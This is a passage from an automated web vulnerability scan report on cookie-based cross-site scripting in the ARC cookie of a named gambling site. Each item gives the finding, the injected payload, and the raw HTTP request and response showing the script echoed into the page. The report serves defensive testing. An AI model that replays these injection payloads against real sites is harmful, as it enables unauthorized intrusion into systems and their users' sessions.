Date: Mon, 16 May 2011 12:35:03 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20592
Content-Type: text/html
Set-Cookie: ARC=130137ac357%27%3Balert%281%29%2F%2F6b580480cc3; expires=Tue, 15-May-2012 12:35:02 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=130137ac357';alert(1)//6b580480cc3&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.340. http://www.primescratchcards.com/SecurityAndPrivacy.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/SecurityAndPrivacy.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7c28"%3balert(1)//1755fc7fa81 was submitted in the ARC cookie. This input was echoed as c7c28";alert(1)//1755fc7fa81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /SecurityAndPrivacy.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137c7c28"%3balert(1)//1755fc7fa81; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20592
Content-Type: text/html
Set-Cookie: ARC=130137c7c28%22%3Balert%281%29%2F%2F1755fc7fa81; expires=Tue, 15-May-2012 12:35:02 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137c7c28";alert(1)//1755fc7fa81' border='0' width='1' height='1'>
...[SNIP]...

3.341. http://www.primescratchcards.com/aboutus.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/aboutus.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload b1e50--><script>alert(1)</script>906211bf86e was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /aboutus.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137b1e50--><script>alert(1)</script>906211bf86e; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22019
Content-Type: text/html
Set-Cookie: ARC=130137b1e50%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E906211bf86e; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137b1e50--><script>alert(1)</script>906211bf86e">
...[SNIP]...

3.342. http://www.primescratchcards.com/aboutus.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.primescratchcards.com
Path:	/aboutus.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30874'%3b42237077da was submitted in the ARC cookie. This input was echoed as 30874';42237077da in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /aboutus.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013730874'%3b42237077da; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 21990
Content-Type: text/html
Set-Cookie: ARC=13013730874%27%3B42237077da; expires=Tue, 15-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD13cad";alert(1)//2102d64af9&AR=13013730874';42237077da&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.343. http://www.primescratchcards.com/aboutus.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/aboutus.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef6a6"%3balert(1)//494849c4a21 was submitted in the ARC cookie. This input was echoed as ef6a6";alert(1)//494849c4a21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /aboutus.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137ef6a6"%3balert(1)//494849c4a21; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22005
Content-Type: text/html
Set-Cookie: ARC=130137ef6a6%22%3Balert%281%29%2F%2F494849c4a21; expires=Tue, 15-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137ef6a6";alert(1)//494849c4a21' border='0' width='1' height='1'>
...[SNIP]...

3.344. http://www.primescratchcards.com/affiliates.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/affiliates.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 8654c--><script>alert(1)</script>38a0a9c6cd5 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /affiliates.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301378654c--><script>alert(1)</script>38a0a9c6cd5; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 23726
Content-Type: text/html
Set-Cookie: ARC=1301378654c%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E38a0a9c6cd5; expires=Tue, 15-May-2012 12:34:50 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="1301378654c--><script>alert(1)</script>38a0a9c6cd5">
...[SNIP]...

3.345. http://www.primescratchcards.com/affiliates.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/affiliates.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7291'%3balert(1)//55d69b80cd6 was submitted in the ARC cookie. This input was echoed as d7291';alert(1)//55d69b80cd6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /affiliates.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137d7291'%3balert(1)//55d69b80cd6; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 23678
Content-Type: text/html
Set-Cookie: ARC=130137d7291%27%3Balert%281%29%2F%2F55d69b80cd6; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=130137d7291';alert(1)//55d69b80cd6&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.346. http://www.primescratchcards.com/affiliates.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/affiliates.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0f4e"%3balert(1)//baa429ed4f was submitted in the ARC cookie. This input was echoed as d0f4e";alert(1)//baa429ed4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /affiliates.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137d0f4e"%3balert(1)//baa429ed4f; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 23675
Content-Type: text/html
Set-Cookie: ARC=130137d0f4e%22%3Balert%281%29%2F%2Fbaa429ed4f; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137d0f4e";alert(1)//baa429ed4f' border='0' width='1' height='1'>
...[SNIP]...

3.347. http://www.primescratchcards.com/contactus.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/contactus.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9bbe1'%3balert(1)//f80c8b5157d was submitted in the ARC cookie. This input was echoed as 9bbe1';alert(1)//f80c8b5157d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /contactus.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301379bbe1'%3balert(1)//f80c8b5157d; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:06 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 25569
Content-Type: text/html
Set-Cookie: ARC=1301379bbe1%27%3Balert%281%29%2F%2Ff80c8b5157d; expires=Tue, 15-May-2012 12:35:06 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=1301379bbe1';alert(1)//f80c8b5157d&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.348. http://www.primescratchcards.com/contactus.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/contactus.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload e31ab--><script>alert(1)</script>f283e5f141d was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /contactus.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137e31ab--><script>alert(1)</script>f283e5f141d; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 25617
Content-Type: text/html
Set-Cookie: ARC=130137e31ab%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef283e5f141d; expires=Tue, 15-May-2012 12:35:08 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137e31ab--><script>alert(1)</script>f283e5f141d">
...[SNIP]...

3.349. http://www.primescratchcards.com/contactus.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/contactus.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83b35"%3balert(1)//c142e36960e was submitted in the ARC cookie. This input was echoed as 83b35";alert(1)//c142e36960e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /contactus.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013783b35"%3balert(1)//c142e36960e; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:05 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 25569
Content-Type: text/html
Set-Cookie: ARC=13013783b35%22%3Balert%281%29%2F%2Fc142e36960e; expires=Tue, 15-May-2012 12:35:04 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=13013783b35";alert(1)//c142e36960e' border='0' width='1' height='1'>
...[SNIP]...

3.350. http://www.primescratchcards.com/fairplay.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/fairplay.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4224f"%3balert(1)//98ccd355496 was submitted in the ARC cookie. This input was echoed as 4224f";alert(1)//98ccd355496 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /fairplay.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301374224f"%3balert(1)//98ccd355496; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22374
Content-Type: text/html
Set-Cookie: ARC=1301374224f%22%3Balert%281%29%2F%2F98ccd355496; expires=Tue, 15-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301374224f";alert(1)//98ccd355496' border='0' width='1' height='1'>
...[SNIP]...

3.351. http://www.primescratchcards.com/fairplay.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/fairplay.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 498e3'-alert(1)-'22b43d37a6b was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /fairplay.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137498e3'-alert(1)-'22b43d37a6b; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22340
Content-Type: text/html
Set-Cookie: ARC=130137498e3%27%2Dalert%281%29%2D%2722b43d37a6b; expires=Tue, 15-May-2012 12:34:46 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=130137498e3'-alert(1)-'22b43d37a6b&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.352. http://www.primescratchcards.com/fairplay.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/fairplay.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload bcf11--><script>alert(1)</script>7a152d745f7 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /fairplay.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
